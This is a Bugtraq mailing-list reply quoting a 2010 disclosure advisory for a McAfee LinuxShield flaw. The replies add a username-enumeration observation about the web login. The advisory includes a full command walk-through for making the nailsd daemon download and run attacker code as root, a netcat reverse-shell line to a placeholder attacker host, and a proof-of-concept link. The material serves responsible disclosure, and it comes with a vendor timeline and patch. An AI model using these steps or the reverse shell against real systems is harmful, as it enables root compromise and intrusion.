[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: NSOADV-2010-004: McAfee LinuxShield remote/local code execution



ACK! You can find user which can login to the web interface with this trick.


Am 03.03.2010 09:14, schrieb Veal, Richard:
> 
> I believe there could also be a remote user enumeration using this
> service - when attempting to log into the web interface using a
> non-valid username / any password you get "Error: bad credentials" but
> when attempting to log with a valid username / invalid password you seem
> to get: 
> 
> "Error: bad credentials
> Error Information
> Error Code 	Description
> 34 	authentication failure"
> 
> Version 1.5.1, anyone confirm? Has this been mentioned before?
> 
> 
> Rich
> 
> 
> 
> -----Original Message-----
> From: NSO Research [mailto:nso-research@xxxxxxxxxx] 
> Sent: 02 March 2010 21:30
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> 
> ______________________________________________________________________
> 
> NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> ______________________________________________________________________
> ______________________________________________________________________
> 
>                                111101111
>                         11111 00110 00110001111
>                    111111 01 01 1 11111011111111
>                 11111  0 11 01 0 11 1 1  111011001
>              11111111101 1 11 0110111  1    1111101111
>            1001  0 1 10 11 0 10 11 1111111  1 111 111001
>          111111111 0 10 1111 0 11 11 111111111 1 1101 10
>         00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100
>        10111111 0 01 0  1 1 111110 11 1111111111111  11110000011
>        0111111110 0110 1110 1 0 11101111111111111011 11100  00
>        01111 0 10 1110 1 011111 1 111111111111111111111101 01
>        01110 0 10 111110 110 0 11101111111111111111101111101
>       111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
>       111110110 10 0111110 1 0 0 1111111111111111111111111 110
>     111 11111 1  1 111 1   10011 101111111111011111111 0   1100
>    111 10  110 101011110010   11111111111111111111111 11 0011100
>    11 10     001100     0001      111111111111111111 10 11 11110
>   11110       00100      00001     10 1  1111  101010001 11111111
>   11101        0  1011     10000    00100 11100        00001101 0
>   0110         111011011             0110   10001        101 11110
>   1011                 1             10 101   000001        01   00
>    1010 1                              11001      1 1        101  10
>       110101011                          0 101                 11110
>             110000011
>                       111
> ______________________________________________________________________
> ______________________________________________________________________
> 
>   Title:                  McAfee LinuxShield remote/local code
>                           execution
>   Severity:               Medium
>   Advisory ID:            NSOADV-2010-004
>   Found Date:             07.12.2009
>   Date Reported:          05.02.2010
>   Release Date:           02.03.2010
>   Author:                 Nikolas Sotiriu (lofi)
>   Website:                http://sotiriu.de
>   Twitter:                http://twitter.com/nsoresearch
>   Mail:                   nso-research at sotiriu.de
>   URL:                    http://sotiriu.de/adv/NSOADV-2010-004.txt
>   Vendor:                 McAfee (http://www.mcafee.com/)
>   Affected Products:      McAfee LinuxShield <= 1.5.1
>   Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
>   Remote Exploitable:     Yes (attacker must be authenticated)
>   Local Exploitable:      Yes
>   Patch Status:           Vendor released a patch (See Solution)
>   Discovered by:          Nikolas Sotiriu
>   Thanks to:              Thierry Zoller: For the permission to use his
>                                           Policy
> 
> 
> Background:
> ===========
> 
> LinuxShield detects and removes viruses and other potentially unwanted
> software on Linux-based systems. LinuxShield uses the powerful McAfee
> scanning engine - the engine common to all our anti-virus products.
> 
> Although a few years ago, the Linux operating system was considered a
> secure environment, it is now seeing more occurrences of software
> specifically written to attack or exploit security weaknesses in
> Linux-based systems. Increasingly, Linux-based systems interact with
> Windows-based computers. Although viruses written to attack Windows-
> based systems do not directly attack Linux systems, a Linux server can
> harbor these viruses, ready to infect any client that connects to it.
> 
> When installed on your Linux systems, LinuxShield provides protection
> against viruses, Trojan horses, and other types of potentially unwanted
> software.
> 
> LinuxShield scans files as they are opened and closed - a technique
> known as on-access scanning. LinuxShield also incorporates an on-demand
> scanner that enables you to scan any directory or file in your host at
> any time.
> 
> When kept up-to-date with the latest virus-definition (DAT) files,
> LinuxShield is an important part of your network security. We recommend
> that you set up an anti-virus security policy for your network,
> incorporating as many protective measures as possible.
> 
> LinuxShield uses a web-browser interface, and a large number of
> LinuxShield installations can be centrally controlled by ePolicy
> Orchestrator.
> 
> (Product description from LinuxShield Product Guide)
> 
> 
> 
> Description:
> ============
> 
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of McAfee LinuxShield. User interaction is not
> required to exploit this vulnerability but an attacker must be
> authenticated.
> 
> The LinuxShield Webinterface communicates with the localy installed
> "nailsd" daemon, which listens on port 65443/tcp, to do configuration
> changes, query the configuration and execute tasks.
> 
> Each user, which can login to the victim box, can also authenticate it
> self to the "nailsd" and can do configuration changes and execute tasks
> with root privileges.
> 
> A direct execution of commands is not possible, but it is possible to
> download and execute code through manipulation of the config and execute
> schedule tasks of the LinuxShield.
> 
> 
> walk-through (after the TLS handshake):
> +--------------------------------------
> 
> nailsd  > +OK welcome to the NAILS Statistics Service
> attacker> auth <user> <pass>
> nailsd  > +OK successful authentication
> 
> # Set the Attacker repository to download our code from a httpd #
> (catalog.z)
> #---------------------------------------------------------------
> attacker> db set 1 _table=repository status=1 siteList=<?xml\ version
>           ="1.0"\ encoding="UTF-8"?><ns:SiteLists\ xmlns:ns="naSiteLi
>           st"\ GlobalVersion="20030131003110"\ LocalVersion="20091209
>           161903"\ Type="Client"><SiteList\ Default="1"\ Name="SomeGU
>           ID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1
>           "\ Server="<attackerhost>:80"\ Enabled="1"\ Local="1"><Rela
>           tivePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></
>           UserName><Password\ Encrypted="0"/></HttpSite></SiteList></
>           ns:SiteLists> _cmd=update
> nailsd  > +OK database changes buffered.
> 
> # Execute task to set the attacker repository
> #---------------------------------------------------------------
> attacker> task setsitelist
> nailsd  > +OK setting sitelist from CMA.
> 
> # Execute the default Update task to download the code
> #---------------------------------------------------------------
> attacker> task nstart LinuxShield Update
> nailsd  > +OK task LinuxShield Update starting
> 
> # Create a Scan profile, which executes our code. The profiles are # not
> stored in the database.
> # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
> #---------------------------------------------------------------
> attacker> sconf ODS_99 begin
> nailsd  > +OK 1260400888
> 
> # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path #
> where our earlier downloaded catalog.z file is stored.
> # (/opt/McAfee/cma/scratch/update/catalog.z)
> #---------------------------------------------------------------
> attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
>           true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
>           DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
>           10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
>           ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
>           file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
>           ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
>           ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
>           .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
>           risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
>           e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
>           .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
>           le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
>           dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
>           e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
>           ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
>           o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
>           .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
>           rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
>           ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
>           00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
>           ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
>           ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
>            nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
>           ofile.ODS_99.filter.extensions.type=extension nailsd.profil
>           e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
>           .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
>           action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
>           econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
>           ss nailsd.profile.ODS_99.action.error=Block
> nailsd  > +OK configuration changes buffered
> attacker> sconf ODS_99 commit 1260400888
> nailsd  > +OK configuration changes stored
> 
> # Set a scan task with the manipulated profile to execute the code
> #---------------------------------------------------------------
> attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
>           pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
>           mp;exclude:false timetable=type=unscheduled taskResults=0 i
>           _lastRun=1260318482 status=Stopped _cmd=insert nailsd  > +OK
> database changes buffered
> 
> # Execute scan task to execute the code
> #---------------------------------------------------------------
> attacker> task nstart Evil Task
> 
> +-------------------------------------- walk-through EOF
> 
> 
> To get a reverse root shell place something like this in the catalog.z
> 
> --- snip ---
> #!/bin/sh
> nc -nv <attacker_host> 4444 -e /bin/sh
> --- /snip ---
> 
> 
> 
> Proof of Concept :
> ==================
> 
> http://sotiriu.de/software/NSOPOC-2010-004.tar.gz
> 
> 
> 
> Solution:
> =========
> 
> McAfee Advisory
> +--------------
> https://kc.mcafee.com/corporate/index?page=content&id=SB10007
> 
> 
> 
> Disclosure Timeline (YYYY/MM/DD):
> =================================
> 
> 2009.12.07: Vulnerability found
> 2010.02.03: Asked vendor for a PGP key
> 2010.02.05: Vendor sent his PGP key
> 2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
>             date (2010.02.18) to Vendor
> 2010.02.05: Vendor acknowledges the reception of the advisory
> 2010.02.16: Ask for a status update, because the planned release date is
>             2010.02.18.
> 2010.02.16: Vendor response that, they are currently working on a patch
> 2010.02.17: Changed release date to 2010.02.25.
> 2010.02.22: Vendor gives a status update, that they are able to release
>             the patch on 2010.02.25.
> 2010.02.24: Ask for a list of affected products and the advisory url.
> 2010.02.24: Vendor sends the list.
> 2010.03.02: Release of this Advisory
> 
> 
> 
> 
> 
> 
> 
> ______________________________________________________________________
> This email has been scanned by the MessageLabs Email Security System.
> For more information please visit http://www.messagelabs.com/email
> ______________________________________________________________________
> 
> Western Power Distribution (South West) plc / Western Power Distribution (South Wales) plc 
> Registered in England and Wales 
> Registered number: 2366894 (South West) / 2366985 (South Wales) 
> Registered Office: Avonbank, Feeder Road, Bristol, BS2 0TB 
> 
> This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify postmaster@xxxxxxxxxxxxxxxxxx